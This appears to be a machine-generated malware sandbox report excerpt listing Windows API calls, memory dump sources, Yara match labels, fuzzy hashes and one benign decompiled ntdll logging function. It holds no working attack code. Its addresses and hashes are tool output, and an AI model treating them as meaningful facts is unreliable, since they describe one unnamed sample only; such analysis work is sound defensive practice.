                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(001E4506,?,001E4C7F,001E4C7F,?,001E4506,?,?,?,?,?,00000000,00000000,?), ref: 001EA05D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction ID: f50fde2cf8052fb39bc7f1884dc6aea61d48c8004a3a678b0595902ea7935c45
                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction Fuzzy Hash: 24E04FB1200208ABD714DF59CC41EA777ACEF88754F118558FE085B242C630F910CBF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1A2,001DF1A2,?,00000000,?,?), ref: 001EA200
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction ID: d81a491eb1b3b6a4c772da26f31ddf3c6805fb996a440d4f45e06667d631a59b
                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction Fuzzy Hash: CFE01AB1200208ABDB10DF49CC85EEB37ADEF88650F018154BA0867242CA30F8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,001D8CF4,?), ref: 001DF6CB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
                                                                              • Instruction ID: 12e31c6c42888344b18f18d82dadd9ed9d7029760ff3a569f7a9efa97fffec48
                                                                              • Opcode Fuzzy Hash: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
                                                                              • Instruction Fuzzy Hash: F5D095317503043BE600FEB5DC03F263ACDAB05B50F090074FA49D73C3DA14E1014069
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,001D8CF4,?), ref: 001DF6CB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                              • Instruction ID: 8c7dd63932b0ade09caaa8c1de2c71b3689d0d296e8c59165e7089643f61a337
                                                                              • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                              • Instruction Fuzzy Hash: 7BD0A7717903043BE610FAA59C03F2632CD6B54B00F490074FA49D73C3DA54E5014165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6d73c311eeda015f373c7a376fe4d304e130c9ebe8ec511de2670b27aa01e7bc
                                                                              • Instruction ID: de25ea613d828535194a6d1b67f760c8a77a58d968e37df4fad9b04793068196
                                                                              • Opcode Fuzzy Hash: 6d73c311eeda015f373c7a376fe4d304e130c9ebe8ec511de2670b27aa01e7bc
                                                                              • Instruction Fuzzy Hash: D6B092B29425C5CAFB51EBA06B08B2B7E54BBD0745F26C062E2031781A4778E095F6B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              C-Code - Quality: 53%
                                                                              			E045BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                              				void* _t7;
                                                                              				intOrPtr _t9;
                                                                              				intOrPtr _t10;
                                                                              				intOrPtr* _t12;
                                                                              				intOrPtr* _t13;
                                                                              				intOrPtr _t14;
                                                                              				intOrPtr* _t15;
                                                                              
                                                                              				_t13 = __edx;
                                                                              				_push(_a4);
                                                                              				_t14 =  *[fs:0x18];
                                                                              				_t15 = _t12;
                                                                              				_t7 = E0456CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                              				_push(_t13);
                                                                              				E045B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                              				_t9 =  *_t15;
                                                                              				if(_t9 == 0xffffffff) {
                                                                              					_t10 = 0;
                                                                              				} else {
                                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                              				}
                                                                              				_push(_t10);
                                                                              				_push(_t15);
                                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                              				return E045B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                              			}











                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045BFDFA
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045BFE01
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045BFE2B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 9d88b68bb3a146432cf4c0ca003814c0fc96cbf2a96eeb0e8c7a6dcb9a543c44
                                                                              • Instruction ID: 6086c81a7fbca45b4731670231f2694c8b770e9866df2cd56d9300f7ec581ea9
                                                                              • Opcode Fuzzy Hash: 9d88b68bb3a146432cf4c0ca003814c0fc96cbf2a96eeb0e8c7a6dcb9a543c44
                                                                              • Instruction Fuzzy Hash: 4BF0C236200241BBE6251A45DC02E63BB6AFB85774F240214F668561E1EA62B830A6E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%